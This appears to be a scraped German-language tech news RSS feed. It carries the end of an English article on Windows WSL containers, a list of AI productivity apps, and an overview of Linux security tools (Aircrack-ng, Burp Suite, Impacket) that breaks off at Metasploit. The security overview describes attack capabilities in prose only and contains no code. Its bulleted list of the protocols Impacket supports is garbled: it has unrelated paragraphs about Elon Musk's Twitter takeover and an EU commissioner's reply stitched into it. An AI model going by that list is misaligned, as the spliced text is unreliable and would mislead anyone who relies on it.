<p class="wp-block-paragraph">It’s important to remember that this is only the first public preview of a rapidly developing platform. There are many opportunities here to, say, build on the syscall translation layer developed for WSL1 to produce a native Windows-to-Linux application integration stack that removes the overhead of using web-based service calls. It will be interesting to see what develops, but this first release is very interesting indeed.</p>



<h2 class="wp-block-heading">Manage Linux containers from Windows</h2>



<p class="wp-block-paragraph">If you want a Docker Desktop-like experience for building and testing containers on Windows developer hardware, you may not have long to wait. WSL container’s underlying API is already being used to build tools that manage and monitor containers for you. One such tool is the <a href="https://github.com/mhackermsft/wslcontainerdesktop" data-type="link" data-id="https://github.com/mhackermsft/wslcontainerdesktop">WSL Container Desktop</a>, under development on GitHub. While there aren’t any release builds yet, it’s easy enough to compile and get running by cloning the source repository and building using the .NET CLI. You do need to have the <a href="https://github.com/microsoft/windowsappsdk" data-type="link" data-id="https://github.com/microsoft/windowsappsdk">Windows App SDK</a> installed, and some features require access to the Azure CLI.</p>



<p class="wp-block-paragraph">WSL Container Desktop is built in C#, with a WinUI front end. It’s currently only verified for use on x64, though I was able to compile and run it on an Arm64 PC and use it to test and run containers. Once running, it gives you a well-designed front end for your WSL-hosted containers, showing what’s running and what resources they are using. You can link WSL Container Desktop to container registries, like Docker’s and Azure’s, so you can quickly pull base containers and then use the WSL container environment to add your own code and customizations.</p>



<p class="wp-block-paragraph">Your main interaction point is the WSL Container Desktop dashboard, which shows what containers are running and their current resource usage. Elements are displayed in cards, taking a cue from Windows’ own user interface and especially from its Settings app. From the dashboard, you can drill down into the available containers, with quick start, stop, and reload options, as well as an extended memory that includes the ability to open a web browser to the appropriate port. I tested this with a container that included an entire KDE webtop, giving me a Linux distro running in a container in my browser.</p>



<p class="wp-block-paragraph">Other options include a details view that displays current logs and provides tools for inspecting the state of a container. This is the type of tool that comes in useful when debugging and testing container applications, as it can provide insights that the WSL container CLI doesn’t offer. Another option helps you clean up after you’ve downloaded an image and don’t need it anymore, with analytics that show the largest images and images you haven’t used for some time. On top of its tooling for working with WSL containers, WSL Container Desktop provides a basic settings tool that helps you configure its look and feel, as well as how it integrates with Windows.</p>



<h2 class="wp-block-heading">Run Kubernetes inside Windows for cloud-native development</h2>



<p class="wp-block-paragraph">One of the more useful features of WSL Container Desktop is the ability to quickly stand up a <a href="https://k3s.io/" data-type="link" data-id="https://k3s.io/">K3s</a> Kubernetes instance in WSL that can be used to host WSL containers, providing a local environment to build and test cloud-native applications wherever you might be. The K3s tooling offers a similar experience to the Kubernetes project’s own <a href="https://www.infoworld.com/article/3964051/headlamp-a-multicluster-kubernetes-user-interface.html">Headlamp UI</a>, making it easy to go between your development environment and a production Kubernetes cluster.</p>



<p class="wp-block-paragraph">It’s fair to describe WSL container as one of those Windows features you didn’t think you needed, but now it’s here you can’t live without it. WSL container simplifies building a container development tool chain in Windows, and at the same time allows you to think about a new generation of hybrid applications that take advantage of decades of development in both Windows and Linux.</p>



<p class="wp-block-paragraph">The result is something that was unimaginable a few years ago: dropping a Linux container into the middle of a Windows application and treating it as another local service. As the WSL container platform evolves, you should expect to see more ways of bringing Linux and Windows together, using containers to deliver a hybrid platform that gives us the best of both worlds at long last.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kostenlos bei Amazon: 20 gratis Kindle-E-Books für Fans von Liebe und Spannung]]></title>
<description><![CDATA[Amazon hat wieder 20 Kindle-E-Books kostenlos im Angebot. Diesmal dominieren romantische Lovestorys und spannende Krimis, ergänzt durch einen unterhaltsamen Ausflug in die Welt des unnützen Wissens.]]></description>
<link>https://tsecurity.de/de/3688424/it-nachrichten/kostenlos-bei-amazon-20-gratis-kindle-e-books-fuer-fans-von-liebe-und-spannung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688424/it-nachrichten/kostenlos-bei-amazon-20-gratis-kindle-e-books-fuer-fans-von-liebe-und-spannung/</guid>
<pubDate>Thu, 23 Jul 2026 10:47:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Amazon hat wieder 20 Kindle-E-Books kostenlos im Angebot. Diesmal dominieren romantische Lovestorys und spannende Krimis, ergänzt durch einen unterhaltsamen Ausflug in die Welt des unnützen Wissens.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wer Gemini nutzen möchte, sollte diese Abo-Unterschiede kennen]]></title>
<description><![CDATA[Gemini ist die leistungsstarke KI von Google. In diesem Artikel erfahrt ihr, welche Funktionen kostenlos sind und wann sich welches Abo lohnt.]]></description>
<link>https://tsecurity.de/de/3688330/it-nachrichten/wer-gemini-nutzen-moechte-sollte-diese-abo-unterschiede-kennen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688330/it-nachrichten/wer-gemini-nutzen-moechte-sollte-diese-abo-unterschiede-kennen/</guid>
<pubDate>Thu, 23 Jul 2026 10:02:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Gemini ist die leistungsstarke KI von Google. In diesem Artikel erfahrt ihr, welche Funktionen kostenlos sind und wann sich welches Abo lohnt.]]></content:encoded>
</item>
<item>
<title><![CDATA[Die besten KI-Apps, um Zeit zu sparen]]></title>
<description><![CDATA[Diese KI-basierten Productivity-App-Perlen helfen wirklich gegen Zeitdruck, Überstunden und repetitive Tasks.
					Foto: N Universe | shutterstock.com




Unter den Massen von KI-Tools und -Anwendungen, die aktuell als Mobile-, Desktop- oder Web-App zur Wahl stehen, gibt es nicht wenige, die sich...]]></description>
<link>https://tsecurity.de/de/3687939/it-security-nachrichten/die-besten-ki-apps-um-zeit-zu-sparen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687939/it-security-nachrichten/die-besten-ki-apps-um-zeit-zu-sparen/</guid>
<pubDate>Thu, 23 Jul 2026 06:09:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Diese KI-basierten Productivity-App-Perlen helfen wirklich gegen Zeitdruck, Überstunden und repetitive Tasks." title="Diese KI-basierten Productivity-App-Perlen helfen wirklich gegen Zeitdruck, Überstunden und repetitive Tasks." src="https://images.computerwoche.de/bdb/3393107/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Diese KI-basierten Productivity-App-Perlen helfen wirklich gegen Zeitdruck, Überstunden und repetitive Tasks.</p></figcaption></figure><p class="imageCredit">
					Foto: N Universe | shutterstock.com</p></div>




<p class="wp-block-paragraph">Unter den Massen von KI-Tools und -Anwendungen, die aktuell als Mobile-, Desktop- oder Web-App zur Wahl stehen, gibt es nicht wenige, die sich in erster Linie dadurch auszeichnen, dass sie:</p>



<ul class="wp-block-list">
<li><p>Output von fragwürdiger Genauigkeit liefern,</p></li>



<li><p>dubiose Texte erzeugen, oder</p></li>



<li><p>Bilder generieren, die zum Klick auf den X-Button verleiten.</p></li>
</ul>



<p class="wp-block-paragraph">KI-Tools dieser Art sind vor allem darauf ausgerichtet, vom anhaltenden Generative-AI (GenAI)-Hype <a title="zu profitieren" href="https://www.computerwoche.de/article/2823104/9-strategien-gegen-ki-anbieterluegen.html" target="_blank">zu profitieren</a> – und trüben leider auch den Blick für die echten Anwendungsperlen im Bereich generative KI. Wie etwa die folgenden GenAI-Apps, die Ihre Produktivität im Arbeitsalltag drastisch steigern und damit erhebliche Zeitgewinne <a title="realisieren können" href="https://www.computerwoche.de/article/2765021/wie-sie-puenktlich-in-den-feierabend-kommen.html" target="_blank">realisieren können</a>. Probieren Sie’s aus!</p>



<h2 class="wp-block-heading">1. <a href="https://www.chatpdf.com/" target="_blank" rel="noreferrer noopener">ChatPDF</a></h2>



<p class="wp-block-paragraph">Sie kennen solche Situationen: Jemand schickt Ihnen einen schlanken 300-Seiter im .pdf-Format und bereits nach Seite Zwei stellt sich heraus, dass sich dieser in etwa so faszinierend liest wie eine Steuererklärung. In Zukunft dürfen Sie sich bei solchen und ähnlichen Gelegenheiten auf ChatPDF verlassen und dabei richtig Zeit einsparen. </p>



<p class="wp-block-paragraph">Dieses rein webbasierte Tool – nicht zu verwechseln mit gleichnamigen Mobile Apps – tut exakt das, was es verspricht: Sie befähigen, mit .pdf-Dateien <a title="zu chatten" href="https://www.computerwoche.de/article/2830445/5-wege-llms-lokal-auszufuehren.html" target="_blank">zu chatten</a>. Darüber hinaus können Sie über das Webportal auch Office-Dokumente im .doc- oder .docx-Format hochladen, um anschließend dank KI-Unterstützung möglichst schnell und einfach Informationen über den Inhalt zu erfragen. Dabei kann es sich konkret um einfache Zusammenfassungen oder spezifische, inhaltsbezogene Fragen handeln. Sie können bei Bedarf sogar mehrere Dokumente einspeisen und diese gemeinschaftlich abfragen. Die Verantwortlichen von ChatPDF versprechen dabei, sämtliche Daten sicher zu speichern, auf Anfrage zu löschen und keinesfalls an Dritte weiterzugeben. Dennoch sollten sensible unternehmensbezogene Dokumente eher nicht diesen Weg nehmen.</p>



<p class="wp-block-paragraph">ChatPDF verarbeitet davon abgesehen Dokumente in (fast) jeder Sprache – und unterstützt diese auch mit Blick auf die KI-Chat-Funktion. Zwei Dokumente dürfen Sie täglich kostenlos über den Service hochladen und abfragen – wobei die Dateien maximal 120 Seiten lang oder 10 MB groß sein dürfen. Die GenAI-<a title="Webanwendung" href="https://www.computerwoche.de/article/2805798/7-webseiten-die-ihre-desktop-software-ersetzen.html" target="_blank">Webanwendung</a> dürfte also in ihrer kostenlosen Variante bereits für die meisten Gelegenheits-User ausreichend sein. Sollten Sie Bedarf haben, der darüber hinausgeht, steht Ihnen die Bezahlversion ChatPDF Plus ab <strong>24,99 Euro pro Monat</strong> (oder circa <strong>120 Euro pro Jahr</strong>) zur Verfügung.</p>



<h2 class="wp-block-heading">2. <a href="https://www.beautiful.ai/" target="_blank" rel="noreferrer noopener">Beautiful.ai</a></h2>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2763768/so-praesentieren-sie-richtig.html" title="Präsentationen" target="_blank">Präsentationen</a> (richtig) zu erstellen, kann zum Pain geraten. Es sei denn, Sie lassen Generative AI den wesentlichen Teil des Gestaltungsprozesses übernehmen. Das funktioniert mit der KI-basierten Präsentationssoftware Beautiful.ai. Das (möglicherweise) größte Defizit dieses ebenfalls webbasierten KI-Tools ist, dass es zwar auch deutschsprachige Prompts verarbeitet, zur Zeit aber nur englischsprachige Präsentationen erstellt. Das tut es dafür aber richtig gut, wie bereits die Mini-Demo auf der offiziellen Webseite zeigt. Die KI-App unterstützt Sie nicht nur beim Design der einzelnen Folien, sondern auch bei der Formatierung von Inhalten und dabei, Brand Guidelines einzuhalten – sowie bei allen anderen Aspekten, die wichtig sind, damit Ihre Präsentation einen möglichst professionellen Eindruck hinterlässt. </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Dieses Slide-Set hat Beautiful.ai in wenigen Sekunden zum Thema Arbeit der Zukunft erstellt. " title="Dieses Slide-Set hat Beautiful.ai in wenigen Sekunden zum Thema Arbeit der Zukunft erstellt. " src="https://images.computerwoche.de/bdb/3393108/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Dieses Slide-Set hat Beautiful.ai in wenigen Sekunden zum Thema Arbeit der Zukunft erstellt. </p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p class="wp-block-paragraph">Die generativen KI-Funktionen des Web-Services umfassen auch eine Funktion, um Inhalte zu generieren. Sie können die KI beispielsweise damit beauftragen, eine ganz bestimmte Art von Präsentation zu einem bestimmten Thema zu erstellen. Dazu zieht die Anwendung öffentlich verfügbare Daten <a href="https://www.computerwoche.de/article/2804141/was-ist-scraping.html" title="heran" target="_blank">heran</a>. Das Ergebnis bedarf zwar sehr wahrscheinlich einer gründlichen Überprüfung, Überarbeitung und Re-Formulierungskur. Dennoch kann es Ihnen eine nützliche erste Grundlage liefern, auf der sich aufbauen und damit potenziell eine Menge Zeit sparen lässt. Beautiful.ai lässt sich mit PowerPoint, Slack, Webex und Dropbox integrieren.</p>



<p class="wp-block-paragraph">Leider gibt’s den KI-Präsentations-Zauber <a title="nicht umsonst" href="https://www.beautiful.ai/pricing" target="_blank" rel="noopener">nicht umsonst</a>. Ein Abonnement für Beautiful.ai kostet für Einzelpersonen <strong>12 Dollar pro Monat</strong>. Im Team mit der GenAI-App zu arbeiten, schlägt mit mindestens <strong>40 Dollar pro Nutzer und Monat</strong> zu Buche. Einen individuellen Enterprise-Preisplan gibt’s auf Anfrage.</p>



<h2 class="wp-block-heading">3. <a href="https://yestoki.com/de" target="_blank" rel="noreferrer noopener">Toki</a></h2>



<p class="wp-block-paragraph">Allen technologiegetriebenen Productivity-Fortschritten zum Trotz bleibt ein Task lästig: mit einem Kalender zu interagieren. Dieser Aufgabe verschreibt sich der KI-Kalenderassistent Toki, der zuvor unter dem Namen Dola bekannt war. Dabei handelt es sich um eine <a title="Chatbot-Lösung" href="https://www.computerwoche.de/article/2807033/was-ist-ein-chatbot.html" target="_blank">Chatbot-Lösung</a>, die sich in die Messaging-Plattformen WhatsApp, Telegram, Line sowie iMessage einbinden lässt und sich anschließend zum Beispiel mit den Kalender-Apps von Google und Apple verbindet. Da dieses KI-Tool das Netzwerkprotokoll CalDAV nutzt, um auf die Kalenderdaten zuzugreifen, müssen Sie im Fall von Outlook leider den Umweg über <a title="ein Drittanbieter-Plugin" href="https://caldavsynchronizer.org/" target="_blank" rel="noopener">ein Drittanbieter-Plugin</a> nehmen.</p>



<p class="wp-block-paragraph">Ist die Integration erledigt, steht Toki über integrierte Schaltflächen in den Messaging-Apps zur Verfügung, um Termine zu erstellen, zu verschieben – oder direkt Fragen zu freien Terminslots zu stellen. Darüber hinaus kann dieses Tool auch genutzt werden, um Termine mit Infos anzureichern – beispielsweise Vorschläge für beliebte Restaurants in einer bestimmten Gegend oder auch Ideen für den neuen Firmenslogan, der beim Meeting gefunden werden soll.</p>



<p class="wp-block-paragraph">Der Service ist in so gut wie allen Sprachen verfügbar und in begrenzten Umfang <a href="https://yestoki.com/de/pricing" target="_blank" rel="noreferrer noopener">kostenlos nutzbar</a>. Zahlende Benutzer erhalten mehr Features ab <strong>3,99 Dollar pro Monat</strong>.</p>



<h2 class="wp-block-heading">4. <a href="https://fathom.video/" target="_blank" rel="noreferrer noopener">Fathom</a></h2>



<p class="wp-block-paragraph">Dass virtuelle Meetings <a href="https://www.computerwoche.de/article/2820706/so-wirken-sie-kompetent-im-online-meetings.html" title="richtig schlimm werden können" target="_blank">richtig schlimm werden können</a>, wissen wir wohl alle. Und auch wenn selbst Generative AI Sie (noch) nicht davor bewahren kann, an digitalen Foltersessions teilzunehmen: Es gibt eine KI-App, die das erträglicher macht – Fathom.</p>



<p class="wp-block-paragraph">Bei dieser Anwendung handelt es sich um einen KI-Assistenten für Videokonferenzen in Form klassischer Software für <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>– oder Mac-Systeme, die wahlweise mit Zoom, Microsoft Teams oder Google Meet integriert wird. Nach der Installation läuft Fathom unauffällig im Hintergrund und transkribiert (über eine Kalender-Integration) entweder automatisch oder auf Knopfdruck sämtliche Videoanrufe. Notizen machen gehört damit in beiden Fällen der Vergangenheit an. Die Zusammenfassungen oder Informationen stehen direkt zur Verfügung und lassen sich gezielt durchsuchen, weiterverarbeiten oder auch in anderen Produktivitäts- und <a href="https://www.computerwoche.de/article/2794966/dokumente-gemeinsam-bearbeiten.html" title="Collaboration-Tools" target="_blank">Collaboration-Tools</a> wie Slack nutzen.</p>



<p class="wp-block-paragraph">Sämtliche Daten werden dabei laut Fathom während der Übertragung und im Ruhezustand verschlüsselt. Außerdem versprechen die Verantwortlichen ausdrücklich, keine KI-Modelle auf Kundendaten zu trainieren. Sämtliche Details zu Security- und Compliance-Themen sind – vorbildlicherweise – über ein <a href="https://trust.fathom.video/" title="dediziertes Trust Center" target="_blank" rel="noopener">dediziertes Trust Center</a> abrufbar.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Fathom realisiert ein umfassendes und sehr fokussiertes Personal-AI-Assistant-Erlebnis." title="Fathom realisiert ein umfassendes und sehr fokussiertes Personal-AI-Assistant-Erlebnis." src="https://images.computerwoche.de/bdb/3393111/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Fathom realisiert ein umfassendes und sehr fokussiertes Personal-AI-Assistant-Erlebnis.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p class="wp-block-paragraph">Die KI-Software unterstützt diverse verschiedene Sprachen, darunter Englisch, Französisch, Spanisch, Italienisch und Deutsch. Noch dazu ist Fathom komplett kostenlos nutzbar – ohne Einschränkungen hinsichtlich der Anzahl oder Länge der aufgezeichneten Videokonferenzen. Erst fortschrittlichere KI-Funktionen lässt sich das Team hinter der GenAI-Anwendung bezahlen.</p>



<p class="wp-block-paragraph">Die <a title="Fathom Team Edition" href="https://fathom.video/for/teams" target="_blank" rel="noopener">Fathom Team Edition</a> bietet weitergehende, fortschrittliche KI-Funktionen – beispielsweise automatisierte Keyword Alerts, Highlight-Zusammenstellungen oder Team-Management-Funktionen. Die kostenpflichtige Variante ermöglicht darüber hinaus die Integration in Enterprise-Systeme wie HubSpot, Salesforce oder Zapier. Die Preise beginnen bei <strong>15 Dollar pro Monat und User</strong>. Die kostenlose Version bietet Premium-Features für fünf Anrufe pro Monat.</p>



<h2 class="wp-block-heading">5. <a href="https://huggingface.co/spaces/Xenova/whisper-web" target="_blank" rel="noreferrer noopener">Whisper Web</a></h2>



<p class="wp-block-paragraph">Falls Sie bereits Audiodateien besitzen, die beispielsweise im Rahmen von Meetings oder Telefongesprächen entstanden sind und jetzt in Text umgewandelt werden sollen, ist Whisper Web die richtige Adresse – zumindest, wenn es sich um englischsprachige Audioaufnahmen handelt. Diese quelloffene Webanwendung basiert auf der Entwicklungsarbeit von <a title="OpenAI" href="https://openai.com/index/whisper/" target="_blank" rel="noopener">OpenAI</a> und bietet Echzeit-Transkriptionen direkt im Browser. Das <a title="Large Language Model" href="https://www.computerwoche.de/article/2823883/was-sind-llms.html" target="_blank">Large Language Model</a>, das dazu zum Einsatz kommt, wird über die App heruntergeladen und lokal ausgeführt – die Daten, die Sie der KI übermitteln, verlassen also das Device nicht.</p>



<p class="wp-block-paragraph">Whisper Web kann Audioinhalte entweder direkt über Ihr Mikrofon erfassen oder aus entsprechenden Audiodateien extrahieren. Laut den Entwicklern ist die KI-App auf mehrsprachige Daten trainiert und unterstützt auch die Transkription anderer Sprachen (zu Englisch). Der Test mit einem deutschsprachigen Audio-File brachte allerdings nicht mehr als undefiniertes Kauderwelsch hervor. Dafür ist das Tool Open Source und <strong>komplett kostenlos nutzbar</strong> – Sie benötigen dazu auch kein dediziertes Konto.</p>



<h2 class="wp-block-heading">6. <a href="https://audiopen.ai/" target="_blank" rel="noreferrer noopener">AudioPen</a></h2>



<p class="wp-block-paragraph">Wenn Sie nicht ohne Ihr Notizbuch (oder eine <a title="entsprechende App" href="https://www.computerwoche.de/article/2823914/notiz-apps-im-vergleich.html" target="_blank">entsprechende App</a>) auskommen, könnte das KI-Tool AudioPen sich zu Ihrer neuen Lieblings-App mausern. Die Software erfasst auf Knopfdruck Sprachnotizen jeglicher Art und erstellt daraus im Handumdrehen eine schriftliche Zusammenfassung. Und zwar in “schön”: Füllwörter oder Wiederholungen werden automatisiert eliminiert. Jede Aufnahme wandert direkt in das digitale Notizbuch und lässt sich anschließend durchsuchen, teilen oder auch in eine andere Sprache übersetzen. Auch bei AudioPen handelt es sich um eine vollständig <a title="webbasierte Applikation" href="https://audiopen.ai/download" target="_blank" rel="noopener">webbasierte Applikation</a>, die sich übrigens optional auch in Form einer <a title="Progressive Web App" href="https://www.computerwoche.de/article/2834608/tutorial-erste-schritte-mit-progressive-web-apps.html" target="_blank">Progressive Web App</a> installieren lässt.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="AudioPen verwandelt selbst die wiederholungsintensivsten Selbstgespräche in prägnante Notizen." title="AudioPen verwandelt selbst die wiederholungsintensivsten Selbstgespräche in prägnante Notizen." src="https://images.computerwoche.de/bdb/3393112/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">AudioPen verwandelt selbst die wiederholungsintensivsten Selbstgespräche in prägnante Notizen.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p class="wp-block-paragraph">Das KI-Tool für Sprachnotizen ist <strong>kostenlos nutzbar</strong>, solange Sie sich auf Aufnahmen mit bis zu drei Minuten Länge und maximal zehn Notizen beschränken können. Für Ansprüche, die darüber hinausgehen, steht eine <a href="https://audiopen.ai/prime" target="_blank" rel="noreferrer noopener">“Prime”-Version der App</a> zur Verfügung, die mindestens <strong>99 Dollar pro Jahr</strong> kostet – dafür aber uneingeschränkt nutzbar ist und eine Reihe zusätzlicher Funktionen bietet. (fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag ist <a href="https://www.computerworld.com/article/2505365/ai-powered-apps-that-actually-save-time.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Computerworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[10 Linux-Pflicht-Tools für Netzwerk- und Security-Profis]]></title>
<description><![CDATA[Wir haben zehn essenzielle Open-Source-Security-Tools für Sie zusammengestellt. 
					Foto: Omelchenko – shutterstock.com




Eine Wahl zu treffen, wenn Dutzende oder gar Hunderte von Tools zur Verfügung stehen, ist nicht einfach. So dürfte es auch vielen Netzwerk- und Security-Experten gehen, di...]]></description>
<link>https://tsecurity.de/de/3687932/it-security-nachrichten/10-linux-pflicht-tools-fuer-netzwerk-und-security-profis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687932/it-security-nachrichten/10-linux-pflicht-tools-fuer-netzwerk-und-security-profis/</guid>
<pubDate>Thu, 23 Jul 2026 06:09:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Wir haben zehn essenzielle Open-Source-Security-Tools für Sie zusammengestellt. " title="Wir haben zehn essenzielle Open-Source-Security-Tools für Sie zusammengestellt. " src="https://images.computerwoche.de/bdb/3340356/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Wir haben zehn essenzielle Open-Source-Security-Tools für Sie zusammengestellt. </p></figcaption></figure><p class="imageCredit">
					Foto: Omelchenko – shutterstock.com</p></div>




<p class="wp-block-paragraph">Eine Wahl zu treffen, wenn Dutzende oder gar Hunderte von Tools zur Verfügung stehen, ist nicht einfach. So dürfte es auch vielen Netzwerk- und <a href="https://www.csoonline.com/de/" title="Security-Experten" target="_blank">Security-Experten</a> gehen, die quelloffene Security Tools für <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a> suchen.</p>



<p class="wp-block-paragraph">In diesem Bereich gibt es eine Vielzahl verschiedener Tools für so gut wie jede Aufgabe (Netzwerk-Tunneling, Sniffing, Scanning, Mapping) und jede Umgebung (Wi-Fi-Netzwerke, Webanwendungen, Datenbankserver). Wir haben einige Experten konsultiert und zehn essenzielle <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a>-Sicherheitstools für Sie zusammengestellt.</p>



<h2 class="wp-block-heading">1. <a href="https://www.aircrack-ng.org/" target="_blank" rel="noreferrer noopener">Aircrack-ng</a></h2>



<p class="wp-block-paragraph">Diese Suite von Software Tools ermöglicht es, drahtlose Netzwerke und WiFi-Protokolle Sicherheitsüberprüfungen zu unterziehen. Sicherheitsprofis verwenden das Tool für die Netzwerkadministration, Hacking und Penetrationstests. Dabei fokussiert Aircrack-ng auf:</p>



<ul class="wp-block-list">
<li><p>Monitoring (Datenpakete erfassen und Daten in Textdateien zur Weiterverarbeitung durch Tools von Drittanbietern exportieren)</p></li>



<li><p>Angreifen (Replay-Angriffe, Deauthentication, Packet Injection)</p></li>



<li><p>Testing (WiFi-Karten und Treiberfunktionen überprüfen) und</p></li>



<li><p>Cracking (WEP und WPA PSK)</p></li>
</ul>



<p class="wp-block-paragraph">Laut der <a href="https://www.aircrack-ng.org/" title="offiziellen Webseite" target="_blank" rel="noopener">offiziellen Webseite</a> funktionieren alle Tools kommandozeilenbasiert, was eine umfangreiche Skripterstellung ermöglicht. Das Tool funktioniert mit <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a> genauso wie mit <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>, macOS, FreeBSD, OpenBSD, NetBSD, Solaris und sogar eComStation.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> kostenlos</p>



<h2 class="wp-block-heading">2. <a href="https://portswigger.net/burp/pro" target="_blank" rel="noreferrer noopener">Burp Suite</a></h2>



<p class="wp-block-paragraph">Hierbei handelt es sich um eine Testing-Suite für Webanwendungen, die für Security Assessments von Websites eingesetzt wird. Burp Suite arbeitet als lokale Proxy-Lösung, die es Sicherheitsexperten ermöglicht, Anfragen (HTTP/Websockets) und Antworten zwischen einem Webserver und einem Browser</p>



<ul class="wp-block-list">
<li><p>entschlüsseln,</p></li>



<li><p>beobachten,</p></li>



<li><p>manipulieren und</p></li>



<li><p>wiederholen zu können.</p></li>
</ul>



<p class="wp-block-paragraph">Burp Suite hat einen passiven Scanner an Bord, mit dem Security-Profis Webseiten (manuell) auf potenzielle Schwachstellen überprüfen können. Die Pro-Version bietet außerdem einen sehr nützlichen aktiven Web-Schwachstellen-Scanner, mit dem sich weitere Schwachstellen aufspüren lassen. Burp Suite ist über Plugins erweiterbar, so dass Sicherheitsexperten ihre eigenen Erweiterungen entwickeln können.</p>



<p class="wp-block-paragraph"><strong>Preis:</strong> Die Professional-Version kostet 475 Euro pro Jahr und Benutzer. Darüber hinaus steht auch eine Enterprise-Version (ab ca. 2.000 Euro jährlich) zur Verfügung, die mehrere gleichzeitige Scans ermöglicht und von Anwendungsentwicklungsteams genutzt werden kann.</p>



<h2 class="wp-block-heading">3. <a href="https://github.com/fortra/impacket" target="_blank" rel="noreferrer noopener">Impacket</a></h2>



<p class="wp-block-paragraph">Diese Sammlung von Tools ist für Pen-Tests von Netzwerkprotokollen und -diensten unerlässlich. Impacket wurde von SecureAuth entwickelt und ist eine Sammlung von Python Classes, um mit Netzwerkprotokollen zu arbeiten. Impacket konzentriert sich auf die Bereitstellung von Low-Level-Zugriff auf Pakete und bei einigen Protokollen wie SMB1-3 und MSRPC auf die Protokollimplementierung selbst. Sicherheitsexperten können Pakete von Grund auf neu konstruieren, aber auch auf Grundlage geparster Rohdaten. Die objektorientierte <a title="API" href="https://www.computerwoche.de/article/2790525/was-sie-ueber-application-programming-interfaces-wissen-muessen.html" target="_blank">API</a> macht es zudem einfach, mit tiefen Protokollhierarchien zu arbeiten. Impacket unterstützt die folgenden Protokolle:</p>



<ul class="wp-block-list">
<li><p>Ethernet, Linux;</p></li>



<li><p>IP, TCP, UDP, ICMP, IGMP, ARP;</p></li>



<li><p>IPv4 und IPv6;</p></li>



<li><p>Umgänglicher zeigte sich Musk gegenüber den Anzeigenkunden von Twitter. In einem – natürlich auf Twitter geposteten – Brief erklärte der Tesla-Chef, der Grund für die Übernahme sei nicht, damit noch mehr Geld zu verdienen. Vielmehr sei es “wichtig für den Fortbestand der Zivilisation, einen gemeinsamen digitalen Treffpunkt zu haben, auf dem eine breite Palette von Überzeugungen auf gesunde Weise diskutiert werden kann.” </p></li>



<li><p>Trotz alledem dürfe Twitter nicht zu einer “für alle Nutzer freien Höllenlandschaft werden, in der alles ohne Konsequenzen gesagt werden kann”, fügte Musk hinzu. Zusätzlich zur Einhaltung der Gesetze müsse die Plattform “warmherzig und einladend” für alle sein und den Nutzern die Möglichkeit bieten, “die gewünschte Erfahrung nach ihren Vorlieben zu wählen” – ähnlich wie man zum Beispiel wählen kann, Filme zu sehen oder Videospiele zu spielen, die für alle Altersgruppen geeignet sind.</p></li>



<li><p>Plain-, NTLM- und Kerberos-Authentifizierungen, unter Verwendung von Kennwörtern/Hashes/Tickets/Schlüsseln;</p></li>



<li><p>EU-Kommissar Thierry Breton wiederum reagierte auf Musks Teet, dass der Vogel jetzt frei sein, mit der Anmerkung, “dass Twitter in Europa nach unseren Regeln fliegen muss”.</p></li>
</ul>



<p class="wp-block-paragraph"><strong>Preis:</strong> Kostenlos – Impacket wird unter einer leicht modifizierten Version der Apache Software License bereitgestellt. Die Unterschiede können Sie <a href="https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/LICENSE" title="hier einsehen" target="_blank" rel="noopener">hier einsehen</a>.</p>



<h2 class="wp-block-heading">4. <a href="https://www.metasploit.com/" target="_blank" rel="noreferrer noopener">Metasploit</a></h2>



